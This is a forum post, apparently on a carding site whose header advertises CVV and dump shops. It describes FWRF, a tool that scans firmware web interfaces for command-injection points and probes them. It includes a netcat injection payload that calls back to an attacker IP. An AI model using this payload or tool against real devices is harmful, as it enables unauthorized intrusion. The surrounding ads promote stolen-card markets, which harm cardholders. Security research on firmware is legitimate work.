By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
 Ad expire at 03 October 2023
 Ad expire at 03 October 2023
Rescator cvv and dump shop
banner Expire 26 April 2023
banner expire at 13 May

BidenCash Shop
Yale lodge shop
banner Expire 1 April  2021
  • For Purchasing Advertisement and Admin Talk : TELEGRAM :@legitcarders_ws


Dec 5, 2020
FWRF (don't try to pronounce it) is a open source tool for firmware web-side analysis.


Due to some stupids minds, the new trend is to put computers in everything. This poc was initially written for testing some wifi antennas firmware.
The only common element between linux-embedded stuff with web interface is the front side (html/js), the rest can be PHP (ubiquiti), ELF (netgear), some_new_hype_technology... Doesn't matter.
The Goal of FWRF is to find entrypoints, vulnerabilities and try to autosploit them.

How ?

FWRF is composed of 4 parts:

  • File scan : Scan all files in extracted-firmware direcctory
  • Entrypoint scan : extracts urls with args, forms, etc.
  • Check rce : try basic code execution via thoses parameters
  • Test server : Start a test server for manual search
Rce checking
  • A server is started attacker-side (listening to port 10020) and waiting for a tcp packet.
  • the payload sent to {insert here a hype-connected-device name} is echo\t1|nc\tattacker_ip\t10020
  • in case of a dumb code (ex: exec("/bin/do_stuff --foobar $parameter") with controlled parameter, the packet is sent to attacker and FWRF know the attack success.
How to start

Firmware web rce finder

optional arguments:

-h, --help show this help message and exit
-s, --server run test server only for manual tests
base folder of the extracted firmware
Address of live machine (like
Address of this machine (like
-c COOKIES, --cookies COOKIES
Use cookies for authenticated parts
-v, --verbose Verbose mode

  • -s : start the test server, waiting for a tcp packet on port 10020
  • -f : path to the extracted firmware partition
  • -r : remote connected-stuff ip
  • -l : attacker ip (used in payload generation)
  • -c : cookies, if remote interface need authentication ("foo=bar&baz=gu")
  • -v : show more stuff
No magic exploitation

FWRF is not magic, it will only trigger obvious rce. But if you want to search further, it can help. First, use -f and -v parameters, the full list of entry points, parameters and http method is returned. Then, start the test server and search by yourself using the provided payload (or anything sending tcp packet on 10020).
Top Bottom